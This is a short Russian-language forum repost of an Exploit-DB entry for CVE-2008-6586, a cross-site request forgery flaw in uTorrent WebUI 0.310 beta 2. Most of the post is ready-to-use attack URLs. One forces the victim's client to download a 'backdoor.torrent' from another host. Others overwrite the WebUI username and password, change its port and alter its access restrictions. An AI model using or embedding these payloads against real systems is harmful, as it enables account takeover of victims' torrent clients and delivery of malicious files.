Exploit μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31672
Проверка EDB
  1. Пройдено
Автор
TH3.R00K
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6586
Дата публикации
2008-04-18
Код:
source: https://www.securityfocus.com/bid/28847/info

uTorrent WebUI is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to execute arbitrary actions in the context of the affected application.

uTorrent WebUI 0.310 beta 2 is vulnerable; other versions may also be affected.

To force a file download:
http://www.example.com:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent

To change administrative credentials and settings:
http://www.example.com:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://www.example.com:8080/gui/?action=setsetting&s=webui.port&v=4096 http://www.example.com:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
 
Источник
www.exploit-db.com

Похожие темы